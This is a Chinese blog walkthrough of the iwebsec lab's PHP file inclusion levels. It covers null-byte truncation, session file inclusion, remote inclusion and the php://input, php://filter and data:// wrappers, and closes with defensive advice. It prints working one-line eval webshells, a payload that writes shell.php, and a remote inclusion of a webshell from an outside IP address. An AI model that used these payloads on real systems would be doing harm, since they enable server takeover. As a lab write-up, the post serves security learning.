文件包含漏洞2 | iwebsec

接上一篇文章《文件包含漏洞1 | iwebsec》

在这里插入图片描述

查看php版本及配置

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

02-本地文件包含绕过

本关卡的源码

<?php
	if(isset($_GET['filename'])){
	    $filename  = $_GET['filename'];
	    include($filename . ".html");
	}else{
		exit();
	}
?>

看到源码,就想起了文件上传漏洞的绕过方法——%00截断

%00截断

适用条件:

magic_quotes_gpc = Off 
PHP版本 < 5.3.4

在这里插入图片描述

符合条件要求,截断成功。假设shell.png是通过文件上传漏洞上传的木马图片,包含木马图片。

在这里插入图片描述

蚁剑连接

在这里插入图片描述

03-session本地文件包含

上一篇文章的包含日志文件原理:先想办法把恶意代码写入日志(日志内容可控)中,再利用文件包含漏洞包含日志(日志路径可知),并执行日志里的恶意代码。

session文件包含原理:当可以获取session文件路径并且session文件的内容可控的的时候,就可以通过包含session文件进行攻击。

整体思路:通过可控的session值,传入恶意代码,找到session文件地址、文件名,通过文件包含漏洞包含session文件,达到getshell的目的。

通过可控的session值,传入恶意代码
<?php
	if(isset($_GET['iwebsec'])){
		session_start();
		$iwebsec=$_GET['iwebsec'];
		$_SESSION["username"]=$iwebsec;  //将获取的值存入到Session中,内容可控
		echo 'SESSION["username"]的内容是'. $_SESSION['username'];
	}else{
		exit();
	}
?>

写入一句话木马

在这里插入图片描述

找到session文件地址、文件名

Linux系统下的session文件路径:

在这里插入图片描述

因此我们可以猜测本靶场的session文件默认存放的位置为/var/lib/php/session。也可以通过phpinfo查询。

在这里插入图片描述

session文件名的构造:sess_ + sessionidsessionidcookie中可以查看。

在这里插入图片描述

通过文件包含漏洞包含session文件

通过上面可以知道session文件名为/var/lib/php/session/sess_fifbf701gg8gdi4a643r5lrti0,因此可以利用第一关的文件包含漏洞包含session文件。

在这里插入图片描述

蚁剑连接

在这里插入图片描述

04-远程文件包含

远程文件包含(remote file include,RFI)是指包含文件的位置并不在本地服务器,而是通过URL的形式包含到其他服务器上的文件,以及执行文件中的恶意代码。条件:

allow_url_fopen=On
allow_url_include=On
远程包含任意文件

在这里插入图片描述

在这里插入图片描述

远程包含webshell

假设远程服务器有一个文件:test.txt 的内容为<?php phpinfo();@eval($_POST[1]);?>
在正常情况下访问远程服务器URLhttp://8.134.148.36/test.txt,包含在test.txt中的phpinfo函数不会当做PHP代码执行,但是通过远程文件包含漏洞,包含在test.txtphpinfo函数会被当做PHP代码执行。

远程服务器的一个文件。

在这里插入图片描述

远程包含远程服务器的一个文件。

在这里插入图片描述

getshell。

在这里插入图片描述

但是如果包含php文件则不能执行。

在这里插入图片描述

包含的php文件不能执行。

在这里插入图片描述

05-远程文件包含绕过

<?php
	if(isset($_GET['filename'])){
	    $filename  = $_GET['filename'];
	    include($filename . ".html");
	}else{
		exit();
	}
?>
井号(#)截断

在这里插入图片描述

问号(?)截断

在这里插入图片描述

PHP伪协议

协议作用用法
file://用于访问本地文件系统(绝对路径、相对路径、网络路径)在这里插入图片描述
php://input执行POST数据中的php代码在这里插入图片描述
data://通常可以用来执行php代码,一般需要用到base64编码传输。在这里插入图片描述
php://filter读取源代码并进行base64编码输出在这里插入图片描述

06-php://filter伪协议

<?php
	if(isset($_GET['filename'])){
	    $filename  = $_GET['filename'];
	    include($filename);
	}else{
		exit();
	}
?>

在这里插入图片描述

在这里插入图片描述

07-php://input伪协议

<?php
    echo file_get_contents("php://input");
?>

上面代码输出file_get_contents函数获取的php://input数据。测试时在POST处传入字符串,会在页面回显出字符串。

读取POST数据

我本来用hackbar插件发送POST数据的,但是它无法执行成功,因此用burpsuite

在这里插入图片描述

08-php://input伪协议利用

<?php
	if(isset($_GET['filename'])){
	    $filename  = $_GET['filename'];
	    include($filename);
	}else{
		exit();
	}
?>
写入木马

通过php://input传入了一句话木马<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[1]);?>');?>,并在当前目录下建立了shell.php文件。

在这里插入图片描述

在这里插入图片描述

命令执行

在这里插入图片描述

在这里插入图片描述

09-file://伪协议利用

参考《PHP伪协议总结》

绝对路径

在这里插入图片描述

相对路径

在这里插入图片描述

网络路径

在这里插入图片描述

10-data://伪协议利用

在这里插入图片描述

在这里插入图片描述

需要用url编码对+进行编码。

写入木马

一句话木马:<?php @eval($_POST[1]); ?>

在这里插入图片描述

+进行url编码

在这里插入图片描述

在这里插入图片描述

11-漏洞防御

  1. 检查配置文件
    检查 php 中的 php.ini ,其中 allow_url_fopen、allow_url_include 这两个选项与 php 伪协议紧密关联。allow_url_fopen默认是开启的,allow_url_include 默认是关闭,最好根据网站需求,对这两个选项进行合理配置。

  2. 过滤特殊符号
    服务器可以过滤掉执行文件包含操作的符号,例如:\,// 等,以及 php 伪协议常用字符,例如input,output,filter 等,将这些字符进行有效过滤,可以减少恶意文件操作的可能。

  3. 指定包含的文件
    建立一个白名单。当用户创建文件时,将该文件名插入到记录中,以便其请求文件时,站点可以在执行任何包含之前验证文件名。

在这里插入图片描述

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值